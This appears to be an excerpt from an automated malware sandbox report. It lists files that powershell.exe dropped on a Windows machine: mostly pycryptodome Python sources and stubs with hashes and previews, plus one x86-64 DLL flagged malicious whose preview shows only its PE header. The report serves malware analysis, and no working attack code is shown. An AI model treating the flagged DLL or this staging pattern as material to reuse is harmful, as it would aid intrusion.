                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                              Entropy (8bit):4.5743153977203175
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1REvgBAWxXfcAiTMXtKIOcSkWtWemUL/:1REYB9xXkVM96nRWe1/
                                                                                                                                                                                                              MD5:FFE308959102B5607429CEF941E9560E
                                                                                                                                                                                                              SHA1:3DA8DA002FEBDA41FE88459082E6CD8E57B9A5B3
                                                                                                                                                                                                              SHA-256:2F8B0576992C17D8191119B78CF52F73540F11F2502360F71266F5FF848FB5B5
                                                                                                                                                                                                              SHA-512:35EE20412D0AC941F7368DAB82E4A4996DF4058981BA6C07B24E99D533C2BE38E65B8911A7E99EE03A370DF63B557DD3F77839CA10BE939C98BE3E14BB650C65
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import List......def pycryptodome_filename(dir_comps: List[str], filename: str) -> str: ...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10877
                                                                                                                                                                                                              Entropy (8bit):4.8802384608443194
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:9qrskrs9t3q/IPtqY6t+DqX5WZ0cKqRlpZK0Xn4n/noOKcNeJWAc:0rskrs9VqkYRt+DqX5WZrKq7pZpX4/oC
                                                                                                                                                                                                              MD5:B87B25D98E8337122AE998F9ABF4D2B1
                                                                                                                                                                                                              SHA1:9B3FC679A26A4300CAE579BACB9AF93677426927
                                                                                                                                                                                                              SHA-256:67E1B4E201861F9A86E2DB1E548909CDEE46892CDCE59B3575CD9C7FF755BD54
                                                                                                                                                                                                              SHA-512:B15ADEB7D2FC9A050E80499A2CA1D0FD7203E24523C1DF591012AF01E9118B98D384DE0429612D2FEB4D8B9563FBC31A501FE4EE7C53BA2B590DE0A3A0F077F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):933
                                                                                                                                                                                                              Entropy (8bit):4.777842095513583
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RExEeWw8O8GLziQDqwhBhhB+OTlAavvsZPWJuL:8EeTLPqkVv+PiE
                                                                                                                                                                                                              MD5:577B9FD6612492C13AAD9D5FDC396C43
                                                                                                                                                                                                              SHA1:2840A5AE5DA3ADA506BC9E64F4FB1324C021FCA7
                                                                                                                                                                                                              SHA-256:83C6B0310C82B4193830D59B3DABE23544ACF53FF2B53E0F918F2E8DB01F7485
                                                                                                                                                                                                              SHA-512:67E8794F498344EBEE1F95351169355EA139AE6937E867B7716E7A06ECEB3AE30F430630370BE7B06F325434041D9581DFA3831FFBF5F67FF7F88AE24C2935F0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Any, Optional, Union....def load_lib(name: str, cdecl: str) -> Any : .....def c_ulong(x: int ) -> Any : .....def c_ulonglong(x: int ) -> Any : .....def c_size_t(x: int) -> Any : .....def create_string_buffer(init_or_size: Union[bytes,int], size: Optional[int]) -> Any : .....def get_c_string(c_string: Any) -> bytes : .....def get_raw_buffer(buf: Any) -> bytes : .....def c_uint8_ptr(data: Union[bytes, memoryview, bytearray]) -> Any : .......class VoidPointer(object):.. def get(self) -> Any : ..... def address_of(self) -> Any : .......class SmartPointer(object):.. def __init__(self, raw_pointer: Any, destructor: Any) -> None : ..... def get(self) -> Any : ..... def release(self) -> Any : .......backend : str..null_pointer : Any..ffi: Any....def load_pycryptodome_raw_lib(name: str, cdecl: str) -> Any : .....def is_buffer(x: Any) -> bool : .....def is_writeable_buffer(x: Any) -> bool : .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                              Entropy (8bit):4.685843290341897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:6ZVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EMz3DHWMoG4BcX6gbW6O:IVddiT7pgTctEEO3DLoHcqgbW6
                                                                                                                                                                                                              MD5:8F4313755F65509357E281744941BD36
                                                                                                                                                                                                              SHA1:2AAF3F89E56EC6731B2A5FA40A2FE69B751EAFC0
                                                                                                                                                                                                              SHA-256:70D90DDF87A9608699BE6BBEDF89AD469632FD0ADC20A69DA07618596D443639
                                                                                                                                                                                                              SHA-512:FED2B1007E31D73F18605FB164FEE5B46034155AB5BB7FE9B255241CFA75FF0E39749200EB47A9AB1380D9F36F51AFBA45490979AB7D112F4D673A0C67899EF4
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r.`.r.`.r.`.{...p.`.g.a.p.`.9.a.q.`.r.a.Q.`.g.e.y.`.g.d.z.`.g.c.q.`.H.h.s.`.H.`.s.`.H...s.`.H.b.s.`.Richr.`.................PE..d....e.........." ...%............P........................................p............`.........................................`'..t....'..P....P.......@...............`..,...."...............................!..@............ ...............................text...x........................... ..`.rdata....... ......................@..@.data...8....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..,....`.......&..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):37233
                                                                                                                                                                                                              Entropy (8bit):4.49642341890235
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:pdRLPqWbhH6msz9l3UquMwES5LItw+8hlx:pdRVHU9lkquMwES5LD+8Tx
                                                                                                                                                                                                              MD5:9D11029C7D2E1C72C06B462CA3AA996B
                                                                                                                                                                                                              SHA1:E783B5F0CC01BC86D0C16D3B4F54300D57C214C8
                                                                                                                                                                                                              SHA-256:EEDE3556B282CDC640281A6AB6DF6C7EE20F9BE59C37B01AC09EA32F0F35887E
                                                                                                                                                                                                              SHA-512:33D713F6CA8260831AD984D88F279441819308D7C9A3F7A92770D0731BDD74F90EFA46124FAAEACFE74EEACB84D1F6217CA6D01DED3270DF53A5C7D2311B535F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: ascii -*-..#..# Util/asn1.py : Minimal support for ASN.1 DER binary encoding...#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3885
                                                                                                                                                                                                              Entropy (8bit):4.815634844501543
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Acab6f+hGLbu31eXTTVkwB60oofRTOB+Jk2:AcjuJYTTVkS6IF6+m2
                                                                                                                                                                                                              MD5:1EFE3020CA61E0B1DA7B8680D73F84DA
                                                                                                                                                                                                              SHA1:D996C31812286881EB3D6E3FA28715095EC5587F
                                                                                                                                                                                                              SHA-256:4DB889724654605FF759C5B7D754174D13F71B3B621792E48AD0F9BE0CFCCC57
                                                                                                                                                                                                              SHA-512:12D48E230826E09437536FB35642F434E71D5C219A6B61FAF064B785CD09E131F7595AC7DBE1A359C81B23DC24B3436F6AFDF9CE7EBD6961EBEDAF23F5F81F28
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Optional, Sequence, Union, Set, Iterable....__all__ = ['DerObject', 'DerInteger', 'DerOctetString', 'DerNull',.. 'DerSequence', 'DerObjectId', 'DerBitString', 'DerSetOf']....# TODO: Make the encoded DerObjects their own type, so that DerSequence and..# DerSetOf can check their contents better....class BytesIO_EOF:.. def __init__(self, initial_bytes: bytes) -> None: ..... def set_bookmark(self) -> None: ..... def data_since_bookmark(self) -> bytes: ..... def remaining_data(self) -> int: ..... def read(self, length: int) -> bytes: ..... def read_byte(self) -> bytes: .......class DerObject:.. payload: bytes.. def __init__(self, asn1Id: Optional[int]=None, payload: Optional[bytes]=..., implicit: Optional[int]=None,.. constructed: Optional[bool]=False, explicit: Optional[int]=None) -> None: ..... def encode(self) -> bytes: ..... def decode(self, der_encoded: bytes, strict: bool=...) -> DerObject: .......class DerInte
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):97896
                                                                                                                                                                                                              Entropy (8bit):4.090850897275891
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:EnYL5QeQEUkknbkEEpeoc06BsJ7rajyCJrOiVDtT5U1464iPpAji6R449qVnSPt4:0YTXrtNajhJrOs5uPqe6CJn6KEVama39
                                                                                                                                                                                                              MD5:3602B83C3AC94CFAAFA24C3A8C41895B
                                                                                                                                                                                                              SHA1:5F4C1EB93B011F12A117C509CE7A878420D19307
                                                                                                                                                                                                              SHA-256:6CE48B150797316B1DC24B6AD759F0A3F2D3D6DA339E5BCCEDEC9342800450E5
                                                                                                                                                                                                              SHA-512:BC2F5B9DEB7D7678A67092CCCB1BEEA42E2B6BD9E028F9764C675340E247A8967D7704F054A1E4035C9698C8F7DD4FB3548502E157892E2DE36ADF917C3BD311
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..# number.py : Number-theoretic functions..#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew M. Kuchling, Barry A. Warsaw, and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):994
                                                                                                                                                                                                              Entropy (8bit):4.898132103946567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1RE0x1JCvE59p+vE59eE59iLdUKhGnE597pcSpShFE59cSpShFE5vUyrfunVshdU:bxX7Z+crYnJescsje
                                                                                                                                                                                                              MD5:81227B5A65D7EF13CB0247C9B7225673
                                                                                                                                                                                                              SHA1:8954A181B5E8D7B31145E5C139935B9780E4D1EB
                                                                                                                                                                                                              SHA-256:6BD67E3A908997245FB373BC1C4971BAC0CFDD5FC17D4B7CDBD3F51AD6774AF1
                                                                                                                                                                                                              SHA-512:12F42616F440853BF94758392116879BE87073F515AE0C33454BFAC2D80140DE0FCC0469E34D8E06B42436A3EDEF4B5BE8D0E7C5EFCE413CE0F89041556CCA59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import List, Optional, Callable......def ceil_div(n: int, d: int) -> int: .....def size (N: int) -> int: .....def getRandomInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomRange(a: int, b: int, randfunc: Optional[Callable]=None) -> int: .....def getRandomNBitInteger(N: int, randfunc: Optional[Callable]=None) -> int: .....def GCD(x: int,y: int) -> int: .....def inverse(u: int, v: int) -> int: .....def getPrime(N: int, randfunc: Optional[Callable]=None) -> int: .....def getStrongPrime(N: int, e: Optional[int]=0, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> int: .....def isPrime(N: int, false_positive_prob: Optional[float]=1e-6, randfunc: Optional[Callable]=None) -> bool: .....def long_to_bytes(n: int, blocksize: Optional[int]=0) -> bytes: .....def bytes_to_long(s: bytes) -> int: .....def long2str(n: int, blocksize: Optional[int]=0) -> bytes: .....def str2long(s: bytes) -> int: .......sieve_base: List[int]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6010
                                                                                                                                                                                                              Entropy (8bit):4.8279694547928065
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:WKYFQHvoA6pDLeAIeCGtFaVBS3eKQM4ks58B1S9+Ow34eHPwAEx2pdDSSUSAJn7e:W9QHvilIUwpK5lBssOk4eldSE4n7R0ua
                                                                                                                                                                                                              MD5:11D063AE5BC40D2D943DF399F95DDA04
                                                                                                                                                                                                              SHA1:6D8C8391EEBDAE9FE2724F791B5D87A16E4D77CE
                                                                                                                                                                                                              SHA-256:2CF7955872D7D8A23F12B9340AC867E8E342102FED7B80DBA25B6303D7992155
                                                                                                                                                                                                              SHA-512:B2E2C98C03916DE5BB15F36B9A1972769825E1E514AFEA153AC292F3FFF716E589FCF009BD42459D5B7A35C456A3645F2D3D0E59DAFEF198563CDBF83F2B2245
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Util/py3compat.py : Compatibility code for handling Py3k / Python 2.x..#..# Written in 2010 by Thorsten Behrens..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWA
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):870
                                                                                                                                                                                                              Entropy (8bit):4.791491758318878
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:1REgT3JtgPnrnIW9h3MnBbRFNU+U4Fu31954iEe1oHhASLjPMQ:pZtgMcUTkDTtoBjLt
                                                                                                                                                                                                              MD5:E7EC097AA59EF78A17CCA1860BE69741
                                                                                                                                                                                                              SHA1:A25E52635BA19E8324128B8900378458BDAA3AF2
                                                                                                                                                                                                              SHA-256:A1913976F178C28B8A7C117093233AAC0D3E772C4876DA9C084382BB95F2AC2D
                                                                                                                                                                                                              SHA-512:675F6249EF76BDA58D64ABF2BEB84DA58C04A4054F380BC3C2D63CA0D0CAB3342FB36A43925C6176D494F70AC1AEFD06DDB809F28F4A3412E857ACA1F42E6451
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Any, Optional, IO....Buffer = Union[bytes, bytearray, memoryview]....import sys....def b(s: str) -> bytes: .....def bchr(s: int) -> bytes: .....def bord(s: bytes) -> int: .....def tobytes(s: Union[bytes, str]) -> bytes: .....def tostr(b: bytes) -> str: .....def bytestring(x: Any) -> bool: .......def is_native_int(s: Any) -> bool: .....def is_string(x: Any) -> bool: .....def is_bytes(x: Any) -> bool: .......def BytesIO(b: bytes) -> IO[bytes]: .....def StringIO(s: str) -> IO[str]: .......if sys.version_info[0] == 2:.. from sys import maxint.. iter_range = xrange....else:.. from sys import maxsize as maxint.. iter_range = range....class FileNotFoundError:.. def __init__(self, err: int, msg: str, filename: str) -> None:.. pass....def _copy_bytes(start: Optional[int], end: Optional[int], seq: Buffer) -> bytes: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5587
                                                                                                                                                                                                              Entropy (8bit):4.7939511946106
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWYIzbJRSTdOqvdJLb9YmPhv+h:9qrskrs9t3q/Ik8gqlRdhy
                                                                                                                                                                                                              MD5:C08EBC91E1A45FED150F8E5608E2AF15
                                                                                                                                                                                                              SHA1:80AAA3BF9159A68321B464D3DA455D3EB3713F36
                                                                                                                                                                                                              SHA-256:3E36AE472CE5CFBA3B02DBF0CC2A132F868C6DA8002F5B8E895C873DDB79A029
                                                                                                                                                                                                              SHA-512:ACD238B1FC40197C4EA5DAFABD79A2BDBE4BE684F4BC0AB4361EAAD16DA92220A80D26E805D2FDDE01295FF959A91F4A830EE02F4FCB91F3BB0DEDBA295C01CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):249
                                                                                                                                                                                                              Entropy (8bit):4.800678842548869
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:1REYBXyUzrIY3MTDyQdQAY0OXW6ah05gUQdByKj0ah05gv:1REYB3vIY3YyQnrOXAh05VQ6KZh05q
                                                                                                                                                                                                              MD5:81C7899ED070F1D26338977374A4B853
                                                                                                                                                                                                              SHA1:2627B47DA19BB2F2B8E7D25A5A57473C00C86550
                                                                                                                                                                                                              SHA-256:CA7D073C74998CFFB501A2E6E1C99AF62F49272A5FDFB3527769E2A632DFE1A0
                                                                                                                                                                                                              SHA-512:CF5299A774C61A0F84D6E1E4233F426CC9D854D809EEF0D6B1158EC0078E75C54C3141E835DC3D0F376B53EFB8DDE462B49B0A5093C63613B332617966F34D0C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....def strxor(term1: bytes, term2: bytes, output: Optional[Buffer]=...) -> bytes: .....def strxor_c(term: bytes, c: int, output: Optional[Buffer]=...) -> bytes: .....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):191
                                                                                                                                                                                                              Entropy (8bit):4.787641890602914
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:UFo+CmMRJ4ZdK0CJOAlFGCJ7DkCAZFBVC5uQLCY3qXVLCVDvRqvljhfxXFqYLULZ:UvZdK0pAlV/kCAZ4sdXcVz8ljZRFqI5y
                                                                                                                                                                                                              MD5:CAAC9B613D9F7C76FBB1F59F51BBC300
                                                                                                                                                                                                              SHA1:B085C149A8C6051BE179605BA05E49FDC46ACC7D
                                                                                                                                                                                                              SHA-256:73CF19A80E8AAA2D38047F8D4600D5239F9311AA76D68EC430079E44963B6FA6
                                                                                                                                                                                                              SHA-512:EF4DD006C4B3CFD5C48F94F094C3D3A02FA5A5D8185E13203A7E6715CD64CFA98E9A34764364D08AF0C959A23A700E12AC2E404AD322491CA38E75F0B3FD80CF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:__all__ = ['Cipher', 'Hash', 'Protocol', 'PublicKey', 'Util', 'Signature',.. 'IO', 'Math']....version_info = (3, 20, '0')....__version__ = ".".join([str(x) for x in version_info])..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                              Entropy (8bit):4.320003818965119
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1REvgBk8J0fWQLCfcJAOLRL+2MliHovcoFQy:1REYBb0fWpcFY2MtJN
                                                                                                                                                                                                              MD5:BF77DB2C18C7E4E3E80EA7D09C2D8336
                                                                                                                                                                                                              SHA1:682ADC1869A615EBC5152E303D7F10C9DF4800C1
                                                                                                                                                                                                              SHA-256:748D33339311187C619DF8EAA40C8F1A8B4A4EB3E59DE4CDD90FA30105CD8351
                                                                                                                                                                                                              SHA-512:ADD512240AB6D99FF0B4871C7F96849267CCB8CD5BE8BAB86579D5599434266F1C4C290DF395526C694110BDD67DCDA6970CEF39416AB87798AC78914AD87EB7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from typing import Tuple, Union....version_info : Tuple[int, int, Union[int, str]]..__version__ : str..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):472
                                                                                                                                                                                                              Entropy (8bit):5.553838644412217
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:90at8t/f9MSnkxkOXw76+ExZ8g/2IkcMcja7k52OVf:DStFkfA76Tn2xcMb7ksU
                                                                                                                                                                                                              MD5:ADAD6757D0151406CED920C7B9AB949F
                                                                                                                                                                                                              SHA1:3073A93E41B82CE34A3D3173B2C2B823929231E4
                                                                                                                                                                                                              SHA-256:6026433E608ACACF9BB59DFE63FFF807FFFEF7DC970E2B0007C3EE30A4FD3433
                                                                                                                                                                                                              SHA-512:1DA2FC49BF120BC6557CAC494B40E06DAC09CC0830FEE5E71A5A127CD460B367ADA5FFE1A58DC857560859E14E24F28B252581F57C6591C133036726A8FC61C5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........l.e..........................d.....g.d...Z.d.Z.d.j...................e.D...c.g.c.]...}...e.|...............c.}.........Z.y.c...c.}.w.).)...Cipher..Hash..Protocol..PublicKey..Util..Signature..IO..Math).............0...N)...__all__..version_info..join..str..__version__)...xs....0.cC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\Crypto/__init__.py..<module>r........s3..........................h.h....5.1...A....5..6.....5s......-.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9180
                                                                                                                                                                                                              Entropy (8bit):4.915391122855059
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:dmQHvdfT4geS1ztF9+hMkRI4H1Fit/zyc/Kr/yRAL:sedfTTt4Ot/L/KUAL
                                                                                                                                                                                                              MD5:CD9EB61F9BE79E621B31443758388FCC
                                                                                                                                                                                                              SHA1:FC5C64FA12AE0F08E7E12A1AEDD3253A30D633CC
                                                                                                                                                                                                              SHA-256:B6EFBE8172803B4B8F886453F49396A9D65DA9D1E9D4816F35605F3332B43573
                                                                                                                                                                                                              SHA-512:75FA164F181474A32E5A3C9361228FE8BA2AEB32B99F01455C649B926D367C17B2B2F762A940687F42BF20060816EBC5F400FF5EBF106E78DC9082C9ED4803B2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# Cipher/AES.py : AES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3819
                                                                                                                                                                                                              Entropy (8bit):4.806572670333257
                                                                                                                                                                                                              Encrypted:false
